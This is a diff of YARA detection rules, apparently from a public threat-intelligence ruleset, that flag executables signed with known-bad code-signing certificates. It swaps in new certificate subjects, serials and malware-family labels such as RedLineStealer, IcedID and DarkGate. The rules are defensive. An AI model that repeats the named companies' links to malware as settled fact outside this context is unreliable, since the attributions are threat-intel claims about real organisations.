+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai liancheng Technology Co., Ltd." and pe.signatures [ i ] . serial == "62:7d:fd:f7:3a:14:55:de:51:43:a2:70:79:9e:6b:7b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_48Ce01Ac7E137F4313Cc5723Af817Da0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1966Bc76Bda1A708334792Da9A336F69 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d5eb08a7-eb2b-5318-a941-da3ce0a6b634"
+		id = "254ccdb7-df1c-560a-af68-123ea66c3463"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1045-L1056"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7683-L7694"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d92d4aa491b028620f17fd997a782f5e75247b2d3de7ef9026e2c62309275ce1"
+		logic_hash = "d0293e76f8a595d769fd302829bd94a576d647bbacb586728e804bf4dce1af78"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8f594f2e0665ffd656160aac235d8c490059a9cc"
+		thumbprint = "29fec27c36efc6809c7269f76cf86ee18cc6ed87"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ET HOMES LTD" and pe.signatures [ i ] . serial == "48:ce:01:ac:7e:13:7f:43:13:cc:57:23:af:81:7d:a0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SYNTHETIC LABS LIMITED" and pe.signatures [ i ] . serial == "19:66:bc:76:bd:a1:a7:08:33:47:92:da:9a:33:6f:69" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_C7E62986C36246C64B8C9F2348141570 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_82D224323Efa65060B641F51Fadfef02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "44d75e1d-5d5b-5d6f-8f7b-d94cd3908ed7"
+		id = "2c0b0e6d-2c82-506b-88ea-a6d49f0f64a6"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1058-L1069"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7696-L7710"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dfb669ad42ac16d954405dc243b9d81dd9a748a14044d1fce3b71b490c58c82e"
+		logic_hash = "3ed849dfd905e01145274d41b3bbb2c0265b099e540ac17909b6ed59f006e245"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f779e06266802b395ef6d3dbfeb1cc6a0a2cfc47"
+		thumbprint = "8dccf6ad21a58226521e36d7e5dbad133331c181"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "c7:e6:29:86:c3:62:46:c6:4b:8c:9f:23:48:14:15:70" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ee663737D82Df09C7038A6A6693A8323 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Be2F22C152Bb218B898C4029056816A9 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c6684a9f-ca92-53e9-9723-9d2437a16fc6"
+		id = "50c0cee3-39d5-5c57-9515-11356f8cab93"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1086-L1097"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7712-L7726"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4057374b73ef13b6f101b939e11569cf010896097fd9322ab490c73d6808fa6f"
+		logic_hash = "9eba1585d92b184afb7b75b84e0010539ac42ca27e4d5d8bccee6b01e3471cca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dc934afe82adbab8583e393568f81ab32c79aeea"
+		thumbprint = "85fe11e799609306516d82e026d4baef4c1e9ad3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREACIJA d.o.o." and pe.signatures [ i ] . serial == "00:ee:66:37:37:d8:2d:f0:9c:70:38:a6:a6:69:3a:83:23" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3D568325Dec56Abf48E72317675Cacb7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_29E8E993D2406454B6B18Cb377471Bc6 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e958b9c4-2f1b-5b5d-8a44-7393204a6f41"
+		id = "a80f015c-3793-52ac-a405-1a7fe2ca0caa"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1099-L1110"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7728-L7739"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a575c9989a3ee7824e8734940877ddb255b19070def460508f70d32f457411ac"
+		logic_hash = "bf248e664d00675d3fc87070b6358ca7539ef6e748b8bfafcba7ecb91cb1ea05"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e5b21024907c9115dafccc3d4f66982c7d5641bc"
+		thumbprint = "0fb38235366b0ba534a6f81c02d9a67555235e07"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Virtual Byte F-B-I" and pe.signatures [ i ] . serial == "3d:56:83:25:de:c5:6a:bf:48:e7:23:17:67:5c:ac:b7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MONDIAL MONTERO SP Z O O" and pe.signatures [ i ] . serial == "29:e8:e9:93:d2:40:64:54:b6:b1:8c:b3:77:47:1b:c6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3533080B377F80C0Ea826B2492Bf767B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6Daa67498C3A5D8133F28Fefe9Ccc20E : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "42d2328e-742e-5c35-aa14-3b42442543ce"
+		id = "5eb899b3-347d-5e74-8afa-29ffa73c7231"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1127-L1138"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7741-L7754"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7adb9190be4a9cf60adf4b55c8abaa80e01224ea834fc05705afef37703899e"
+		logic_hash = "dc66a18e4f8d14f98e5a8073d32b641e0eb795e989fb62ac23207e765838561a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2afcc4cdee842d80bf7b6406fb503957c8a09b4d"
+		thumbprint = "f54146fadad277f67b14cfebd13cbada9789281cee7165db0277ad51621adb97"
+		reason = "ParallaxRAT"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA8\\x9C\\xE8\\xBF\\xAA\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xA8\\x9C\\xE5\\x93\\xA6\\xE5\\xB0\\xBA\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xD0\\x91\\xE8\\xBF\\xAA\\xD0\\x91\\xE5\\xB0\\xBA\\xE5\\xB0\\xBA\\xE8\\xBF\\xAA\\xE5\\x93\\xA6\\xE8\\xBF\\xAA\\xE5\\x8B\\x92\\xD0\\x91\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xE5\\x8B\\x92\\xE5\\x93\\xA6\\xD0\\x91" and pe.signatures [ i ] . serial == "35:33:08:0b:37:7f:80:c0:ea:82:6b:24:92:bf:76:7b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rimsara Development OU" and pe.signatures [ i ] . serial == "6d:aa:67:49:8c:3a:5d:81:33:f2:8f:ef:e9:cc:c2:0e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B0Ecd32F95F8761B8A6D5710C7F34590 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_59F296D0Af649E0962D724248D9Fdcdb : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2535c9eb-ed4a-52b9-8ad5-80c44c035135"
+		id = "c9423cae-07a7-5ecb-966d-b1636563934a"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1140-L1151"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7756-L7769"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c181dab1f39138c67650d6654353de2be29cdbf45e0f5235776d28d40194f24"
+		logic_hash = "0212033b2ea12f568a3c2e4d3768194c8035c6b6ebf054af90fe82ffcd7e6a5b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2e25e7e8abc238b05de5e2a482e51ed324fbaa76"
+		thumbprint = "ce2aa31a714cc05f86d726a959f6655efc40777aa474fb6b9689154fdc918a44"
+		reason = "DarkGate"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x96\\xAF\\xD0\\xA8\\xD0\\xA8\\xE5\\xBC\\x97\\xE6\\xAF\\x94\\xE5\\xBC\\x97\\xD0\\xA8\\xE6\\xAF\\x94\\xD0\\xA8\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xD0\\xA8\\xE5\\xB0\\x94\\xD0\\xA8\\xE6\\x96\\xAF\\xE5\\xB0\\x94\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "00:b0:ec:d3:2f:95:f8:76:1b:8a:6d:57:10:c7:f3:45:90" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MK ZN s.r.o." and pe.signatures [ i ] . serial == "59:f2:96:d0:af:64:9e:09:62:d7:24:24:8d:9f:dc:db" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3A727248E1940C5Bf91A466B29C3B9Cd : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A32F3Ba229704Ad400473F7479E4C3E4 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "db43ed73-de46-526e-a255-137a4eaaedce"
+		id = "28d687bc-e67c-51d1-82af-53255ee44a8d"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1153-L1164"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7771-L7784"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0afeb50b36d0ca1adbd6cb3accccb3ee093434b8c0bd8b03ae70ecc45c7423b5"
+		logic_hash = "9c7b9b6827e10a8c2a6d771d14068a074104683fe75f24dea85c5bf3f3bc04db"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "eeeb3a616bb50138f84fc0561d883b47ac1d3d3d"
+		thumbprint = "ab4b30913895d8df383fdadebc29d2e04a5c854bc4172c0d41bcbef176e8f37e"
+		reason = "RecordBreaker"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x90\\x89\\xE5\\x90\\x89\\xD0\\x98\\xE5\\x90\\x89\\xD0\\x98\\xE4\\xB8\\x9D\\xE4\\xB8\\x9D" and pe.signatures [ i ] . serial == "3a:72:72:48:e1:94:0c:5b:f9:1a:46:6b:29:c3:b9:cd" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOTUL SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "a3:2f:3b:a2:29:70:4a:d4:00:47:3f:74:79:e4:c3:e4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ce40906451925405D0F6C130Db461F71 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3Ab74A2Ebf93447Adb83554B5564Fe03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5e858504-b1c4-579e-b0e8-f6cf4f434672"
+		id = "1b0be137-ddcf-5215-9cb0-d687d7b6ca6c"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1166-L1177"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7786-L7799"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "02b03b18942cff20ddce429f7be7cc9e54dfbf4884c79c7438c9b9d4415c5b93"
+		logic_hash = "8dbc549ecaf1cb3f07486bac7ed265882af4b6b29b9772736118490eb9233303"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "af79bbdb4fa0724f907343e9b1945ffffb34e9b3"
+		thumbprint = "8ed289fcc40bbc150a52b733123f6094ccfb2c499d6e932b0d9a6001490fb7e6"
+		reason = "RedLineStealer"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xD0\\xA5\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x96\\xAF\\xE7\\xBB\\xB4\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xD0\\xA5\\xE6\\x96\\xAF\\xD0\\xA5\\xD0\\xA5\\xE6\\x96\\xAF\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE6\\x96\\xAF\\xE6\\x9D\\xB0" and pe.signatures [ i ] . serial == "00:ce:40:90:64:51:92:54:05:d0:f6:c1:30:db:46:1f:71" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMPERIOUS TECHNOLOGIES LIMITED" and pe.signatures [ i ] . serial == "3a:b7:4a:2e:bf:93:44:7a:db:83:55:4b:55:64:fe:03" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E130D3537E0B7A4Dda47B4D6F95F9481 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_90212473C706F523Fe84Bdb9A78A01F4 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "efcc63ba-51f9-5b16-a33d-05d536efa6c6"
+		id = "f195cf1e-4e01-51ec-ae12-21ff56dd58e2"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1179-L1190"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7801-L7814"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c394a115fa3fbd7fb2838b61b3c439df3daa9aa44b1901d1740060df0539411e"
+		logic_hash = "8cd1e984bb81f071053614ae9d037d7ff5e01fb95aaa0474492386a7b5faecec"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "89f9786c8cb147b1dd7aa0eb871f51210550c6f4"
+		thumbprint = "6b18e9451c2e93564ed255e754b7e1cf0f817abda93015b21ae5e247c75f9d03"
+		reason = "Cerber"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xBC\\x8A\\xE6\\x96\\xAF\\xE8\\x89\\xBE\\xE4\\xBC\\x8A\\xE8\\x89\\xBE\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92\\xE5\\x8B\\x92" and pe.signatures [ i ] . serial == "00:e1:30:d3:53:7e:0b:7a:4d:da:47:b4:d6:f9:5f:94:81" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMUS, OOO" and pe.signatures [ i ] . serial == "90:21:24:73:c7:06:f5:23:fe:84:bd:b9:a7:8a:01:f4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4Bec555C48Aada75E83C09C9Ad22Dc7C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "664b8f55-03f8-5f36-aaf7-60ee4e613af4"
+		id = "f79e1a89-c7b4-5390-b20b-3f563f409cfe"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1192-L1203"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7816-L7829"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "de4562f70bbe25aa053f2476efca12b99cd4f2ee721df620d02d004bac2a59f9"
+		logic_hash = "da76d86509aee2f9cac992e6b081dce5e68c747ad34abd2daeb32e6e390b880b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a2be2ab16e3020ddbff1ff37dbfe2d736be7a0d5"
+		thumbprint = "285925b7c7c692f8d71d980dcf2ddb4c208a0f7b826ead34db402755d1a0f6de"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xD0\\x92\\xE5\\xB1\\x81\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE5\\x90\\x89\\xE5\\xB0\\x94\\xE5\\x90\\xBE\\xD0\\x92\\xE4\\xB8\\x9D\\xE5\\xB1\\x81" and pe.signatures [ i ] . serial == "4b:ec:55:5c:48:aa:da:75:e8:3c:09:c9:ad:22:dc:7c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_009356E0361Bcf983Ab14276C332F814E7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2A2F270535C2D5E7630720Fb229B5D1C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6b5966d7-59ab-5d8a-936e-71b937424234"
+		id = "3ed98546-92b2-5566-9716-ae8209ece9d6"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1205-L1216"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7831-L7844"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e85adfa9c004a46fe6060a36def3f8387de1484eb9fc3ae935d00265da135eab"
+		logic_hash = "7d9785c12d2d744fbafab009edfb1ef232eadcdbc8eee99d0ad0daacabbabf26"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f8bc145719666175a2bb3fcc62e0f3b2deccb030"
+		thumbprint = "73a0cc4495a49492806b970fd844a0ab078126930305d22c7bf68b43c337fc1a"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xE5\\x90\\x89\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE4\\xB8\\x9D\\xE6\\x9D\\xB0\\xE8\\x89\\xBE\\xE6\\x9D\\xB0\\xE4\\xB8\\x9D\\xE4\\xBC\\x8A\\xE6\\x9D\\xB0\\xE5\\x90\\x89\\xE4\\xBC\\x8A" and pe.signatures [ i ] . serial == "00:93:56:e0:36:1b:cf:98:3a:b1:42:76:c3:32:f8:14:e7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOZUZ SP. Z O.O." and pe.signatures [ i ] . serial == "2a:2f:27:05:35:c2:d5:e7:63:07:20:fb:22:9b:5d:1c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E5D20477E850C9F35C5C47123Ef34271 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4659Fa5Fc1E0397Df79Fd6A4083D93B0 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c8777008-b15f-58c8-9172-f54a4864d2cc"
+		id = "a0d2449c-c1b0-5e6a-9fa3-d8fe8e318c62"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1218-L1229"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7846-L7859"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "984f6dba8613ca43a9ffdcba63e57516bd2c6df02698b87aa4a080f89cc6abc0"
+		logic_hash = "6d8a10d77e63d2a62ce45606dd9a317220aa124a50fa95028a45d9f5899ec6e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d11431836db24dcc3a17de8027ab284a035f2e4f"
+		thumbprint = "fa5f2dbe813b0270b1f9e53da1be024fb495e8b1848bb3c9c7392a40c8f7e8e6"
+		reason = "RedLineStealer"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\x89\\xBE\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\x89\\xBE\\xE5\\x8B\\x92\\xD0\\x92\\xE8\\xB4\\x9D\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92\\xE8\\xB4\\x9D\\xE5\\x8B\\x92\\xD0\\x92\\xE5\\xBE\\xB7\\xE8\\xB4\\x9D\\xD0\\x92\\xD0\\x92\\xE8\\x89\\xBE\\xD0\\x92" and pe.signatures [ i ] . serial == "00:e5:d2:04:77:e8:50:c9:f3:5c:5c:47:12:3e:f3:42:71" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incuber Services LLP" and pe.signatures [ i ] . serial == "46:59:fa:5f:c1:e0:39:7d:f7:9f:d6:a4:08:3d:93:b0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C865D49345F1Ed9A84Bea40743Cdf1D7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_651F3E5B491B197D20C49B9C7B25B775 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2ef45336-bb59-5510-af6f-29e41c9258b9"
+		id = "fb8b4a88-631b-5a5c-ab36-286b74a3a346"
 		date = "2024-10-04"
 		modified = "2024-10-04"
